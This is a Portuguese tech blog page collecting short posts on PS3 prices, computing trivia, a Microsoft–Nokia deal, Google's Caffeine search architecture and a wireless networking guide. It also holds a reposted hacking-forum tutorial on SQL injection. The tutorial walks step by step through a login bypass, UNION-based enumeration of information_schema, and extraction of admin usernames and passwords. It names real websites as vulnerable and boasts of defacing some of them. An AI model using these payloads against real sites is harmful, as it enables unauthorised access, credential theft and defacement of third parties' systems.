Playstation 3 volta a 400€


Os preços da Playstation 3 estão a voltar ao dito "normal", aos 400€, sendo que a sony nunca teve anunciado um Price cut, sendo apenas as lojas a baixarem o preço sabe se lá porque. Neste momento os preços já normalizaram na fnac. Esperemos o que a sony dirá na gamescon na próxima semana. E parabens a quem conseguiu arranjar a ps3 por 300€ nesta "promoção" das lojas.

Curiosidades da informática


Algumas curuosidade da informática retirados do abcdainformatica. Cliquem em "Leia mais..."



Vida de Inseto

Em 1943, durante o desenvolvimento do computador Mark II um relê dentro do computador falhou e os pesquisadores demoraram um mês para descobrir um inseto morto, uma mariposa, dentro de seus contatos. Hoje, o termo bug (inseto em inglês) é utilizado para designar pequenas falhas em softwares, que vão de pequenas perturbações até prejuízos graves.


Muito calor

Os tubos de vácuo dos primeiros computadores produziam tanto calor que poderiam aquecer uma grande cidade.

Bomba Atômica

O Eniac foi desenvolvido para servir aos interesses bélicos dos EUA durante a II Guerra Mundial e serviu para fazer os cálculos no desenvolvimento da bomba atômica.


Resultado das Eleições

Em 1952, o UNIVAC, primeiro computador comercial da História, previu a vitória para presidente dos Estados Unidos de Eisenhower, analisando apenas cinco por cento dos votos.

Primeiras Vendas

Em 1954, a IBM fabricou o computador IBM 650, projetando a venda de 50 exemplares do computador, mais do que todos os computadores do mundo juntos, o que foi considerado um exagero. Apesar do pessimismo, em 1958 duas mil unidades do IBM 650 estavam espalhadas pelo mundo.


Teclado Lento

A maioria dos teclados do computador possui a seguinte seqüência de caracteres: Q W E R T Y por seguirem um padrão que era utilizado pelas máquinas de escrever. Nelas, ao se digitar muito rápido, ocorria um embaralhamento de teclas. Para resolver isto, distanciaram as teclas, para os padrões da língua inglesa, sendo que o nome dessa seqüência no teclado alfanumérico foi uma homenagem ao seu criador.

Parceria - Nokia e Microsoft


De acordo com a CNet, a Microsoft deverá anunciar hoje uma parceria com o gigante das telecomunicações Nokia, no sentido de disponibilizar o seu Office nos telemóveis da empresa.

A Microsoft pretende expandir a sua posição no mercado da produtividade para lá dos computadores tradicionais, e este negócio vem nesse sentido.

Até agora, apenas os smartphones equipados com o Windows Mobile incluíam as versões móveis deste pacote de produtividade.

A parceria deverá será anunciada mais logo, por volta das 16 horas.

Fonte: Exame Informática

Nova arquitectura do motor de busca Google



A Google está a pedir feedback à comunidade de programadores sobre um projecto que tem vindo a desenvolver ao longo dos últimos meses. A empresa assume que o desenvolvimento tem sido "secreto" e alerta que ainda não está terminado....

Trata-se de uma nova arquitectura para o motor de pesquisa. A interface mantém-se a mesma. O que está em causa são melhorias ao nível do tamanho do índice, velocidade de indexação ou qualidade dos resultados de pesquisa, garante a empresa. A nova arquitectura melhora também a capacidade de eliminar resultados falsos.

Caffeine é o nome que identifica o projecto à procura do feedback dos programadores, a quem se solicita que deixem as suas opiniões sobre as alterações.

Os resultados estão no entanto disponíveis para qualquer pessoa num site, embora como a Google sublinhe sejam pouco visíveis para o utilizador comum.

http://www2.sandbox.google.com/

Fonte: Tek

Tudo sobre redes


Para quem pretende criar uma rede wireless e tem dúvidas, ou não sabe muito bem por onde começar, essa apostila está completa. Com 63 páginas para ajudá-lo a criar a sua rede e compartilhalá com outras pessoas.

# Introdução
# O funcionamento do Wi-Fi
# Sinais de rádio
# Frequency-Hopping Spread Spectrum (FHSS)
# Direct-Sequence Spread Spectrum (DSSS)
# Alocação de frequência
# Movimentação de dados
# Verificação de erros
# Estabelecimento de comunicações (handshaking)
# Controles de rede wireless 802.11b
# A camada física
# A camada MAC
# Dispositivos de rede
# Adaptadores de rede
# Pontos de acesso
# Modos de operação
# O que é necessário para o wireless
# Todos falam a mesma língua (mais ou menos)
# Adaptadores de rede
# Fator forma
# PC Cards
# Adaptadores USB
# Placas de expansão internas
# Adaptadores internos
# Antenas internas x externas
# Compatibilidade de sistema operacional
# Facilidade de utilização
# Segurança
# Documentação e suporte técnico
# Reputação
# Adaptadores para redes Ad-Hoc
# Adaptadores de dupla finalidade
# Pontos de acesso
# LANs wireless puras
# Acesso wireless a uma LAN com fio
# Combinando o ponto de acesso com um Hub com fio
# Gateways de banda larga
# Múltiplos pontos de acesso
# Antenas externas
# As antenas são um mundo completamente diferente
# Instalação e configuração dos pontos de acesso
# Quantos pontos de acesso?
# Sondando um local
# Planejamento
# Testando, testando...
# Problemas de interferência
# Instalando pontos de acesso
# Instalação física
# Configurando o ponto de acesso por meio de um browser
# DHCP e outros desastres
# Configurando o ponto de acesso através de uma porta serial
# Comandos de configuração e definições
# Endereço IP
# Máscara de sub-rede
# Wireless Network ID (SSID)
# Canal
# Segurança
# DHCP
# Outras configurações
# Múltiplos pontos de acesso
# Pontos de acesso combinados com Hubs e Roteadores de Gateway
# Wi-Fi para Windows
# Configuração geral de rede no Windows
# Endereços IP
# Atribuição de Endereços
# Máscara de sub-rede
# Gateways
# Servidores de DNS
# Compartilhamento de arquivos e impressoras
# Opções do adaptador de interface de rede
# Dando um nome ao seu computador
# Configurando o Windows 98 e o ME
# Endereço IP e máscara de sub-rede
# Gateway
# Servidores de DNS
# Opções do adaptador de interface de rede
# Identidade de rede
# Configurando o Windows 2000
# Endereço IP e máscara de sub-rede
# Compartilhamento de arquivos e impressoras
# Opções do adaptador de interface de rede
# Identidade de rede
# Configurando o Windows XP
# Status de conexão de rede wireless
# Definições da configuração da rede
# Compartilhamento de arquivos e impressoras
# Opções do adaptador de interface de rede
# Identidade de rede
# Configurando a Rede Wireless no Windows XP
# Resumo: criando a conexão
# Wi-Fi para Linux
# Drivers
# Onde encontrar drivers
# Drivers do Linux
# Outros programas wireless do Linux
# Wireless Tools
# /proc/net/wireless
# iwconfig
# iwspy
# iwpriv
# KOrinoco
# gWireless
# NetCfg
# Wavemon
# Configurando um ponto de acesso
# Estendendo a rede para além das suas próprias paredes
# Aspectos legais
# Antenas externas e pontos de acesso
# Características da antena
# Potência
# Altura da antena
# Atenuação do cabo
# Ligando a vizinhança em rede
# Mantendo seu provedor contente
# Segurança de rede: Todos são seus vizinhos
# Construir sua própria antena?
# Segurança de rede wireless
# Protegendo a sua rede e os seus dados
link:http://www.4shared.com/get/18807836/1366d116/Redes_Wireless__Completo_63_P_ginas_.html;jsessionid=B45AC4972A5B12EECACA2E21A9E5A78C.dc115

[TUT] Information_Schema

Retirado do Forum Black Hat

Para começar temos que saber o básico de sql...

Uma consulta geralmente apresenta a seguinte estrutura:

select NOMEDACOLUNA1,NOMEDACOLUNA2 from NOMEDATABELA where CONDIÇÃO

Onde NOMEDACOLUNA1 e NOMEDACOLUNA2 são as colunas e NOMEDATABELA é a tabela, até ai não há nenhum mistério, mais agora vem a parte mais interessante, Não era Sql injection? Cade o injection? é até agora não houve nenhum injection, mais vamos ver agora...

Como injetar codigo Sql:

Primeiro vamos ver o metodo que é mais dificil de achar sites vulneráveis, o utilizando o metodo POST, entramos no painel administrativo na area de login, e no usuário e na senha colocamos (' or 1 = '1), "sem parentese, vamos ver o que acontece...

select usuario,senha from usuarios where usuario = '' or 1 = '1' and senha = '' or 1 = '1' ;

quem ver essa consulta e entender vai rir... Sabe porque? porque não é necessário usuario e nem senha, para estar logado...

1 vai sempre ser igual a 1!!!!!!!!!!!!!!!!

Agora vamos ver o metodo que ainda funciona com mais frequencia...

O Metodo GET!!!!

alguem já viu alguma url assim? "pagina.php?id=12" ? então!!! O 12 está passando pelo GET!!!! vamos ver como seria a consulta nessa pagina...

select pagina from paginas where id = 12

funciona, mais não é seguro, vamos ver por que...

Mais pera ai!!! Eu já vi esse 12 antes!!!! não era ele que foi passado pelo GET?

Então se agente colocar uma continuação nesse código, sera que ele vai executar?

Claro que vai!!!!
url:" pagina.php?id=12' "
a consulta vai ficar assim...

select pagina from paginas where id = 12'

Mais dai vai gerar um erro né? É claro que vai, você esqueceu de fechar as aspas... (Então se você adicionar uma aspas simples após o numero do GET e gerar um erro ou uma diferença na pagina, é provavel que esteja vulneravel)

Para continuar o ataque vamos ver quantas colunas tem o site, vamos pelo order by,

pagina.php?id=12 order by 10-- //ERRO

pagina.php?id=12 order by 5-- // SEM ERRO

pagina.php?id=12 order by 6-- // SEM ERRO

pagina.php?id=12 order by 7-- //ERRO


Descobrimos que essa página tem 6 colunas

vamos continuar o ataque como o comando union

pagina.php?id=12 union select 1,2,3,4,5,6--

PERA, PERA PERA!!! Que parada é essa ai? "--" é um comando para comentário, tudo que estiver após esse comando nessa linha não será executado...

Ta vamos continuar... Não aparece uns numerosinhos ai na página? sim, sim.

Tá idai???

Substitua um dos números que apareceu na tela pelo o que você quer descobrir, pra começar o nome da tabela em que fica o login e a senha do administrador, vamos ver qual código será usado...

(vamos supor que apareceu o numero 1,2 e o 3)

pagina.php?id=12 union select 1,2,table_name,4,5,6 from information_schema.tables--


Tá!!! Não tem algo diferente agora??? É claro que têm!!! estamos selecionando uma tabela de outra database, a famosa information_schema...


Ta apareceu um nome (CHARACTER_SETS) na tela... Filho esse é o nome da primeira tabela... Ta pai como eu vou ver o nome da segunda tabela? Simples filho acrescente o comando limit!!! Mas Pai como eu uso????

Simples filho, limit 0,1 é a primeira limit 1,1-- é a segunda, limit 2,1-- é a terceira e assim por diante...

Ta mais eu não queria achar a tabela que contem o nome do usuário e a senha???

Claro, é só procurar através do limit!!!

Ex:
pagina.php?id=12 union select 1,2,table_name,4,5,6 from information_schema.tables limit 30,1--

ta, eu descobri o nome da tabela do administrador é "TB_Admin", o que eu faço agora????


Simples usa o where e o information_schema.columns!!!

no nosso caso vai ficar assim!!!

Ex: pagina.php?id=12 union select 1,2,column_name,4,5,6 from information_schema.columns where table_name = "TB_Admin" limit 0,1-- VOCÊ JA SABE USAR O LIMIT!!!


Descubra o nome da coluna do login e da senha e depois faça o exploit...

Ex: pagina.php?id=12 union select 1,2,concat_ws(0x3a,usuario,senha),4,5,6 from TB_Admin--

dai vai aparecer algo assim...

admin:admin

Dai você vai descobrir que não precisava fazer tudo isso, era só tentar as senhas padrões!!! kkkkkkkk!!!!

Com esse passaporte, você descobre o paraiso e depois digite o usuario e a senha, para confirmar a sua estadia... Dai minha parte já acabou...


Por curiosidade:

Quais sites famosos vocês já viram com essa falha????

R: http://www.apostilando.com
http://www.embaixada-americana.org.br //já avisei o adm, e ja arrumou!!!
http://www.america-rj.com.br // já fiz desface, não sei se arrumaram...
http://www.pebodycount.com.br/ já fiz desface, não sei se arrumaram... (tive que pedir desculpas, kkkkkk) os usuários pensaram que foi uma gangue pernambucana!!! kkkkkkkkk

Além de sites de bancos e afins (Hacking tem etica, e roubar dinheiro é uma das coisas que não se deve fazer)

Além desses existem MILHARES AO INFINITO E AO ALÉM!!!

http://www.contaspremium.com.br //Descoberto pelo mestre Jimmy (esse é o cara)!!! Ainda pelo metodo POST!!! kkkkkkkk!!!


Créditos: ---sd---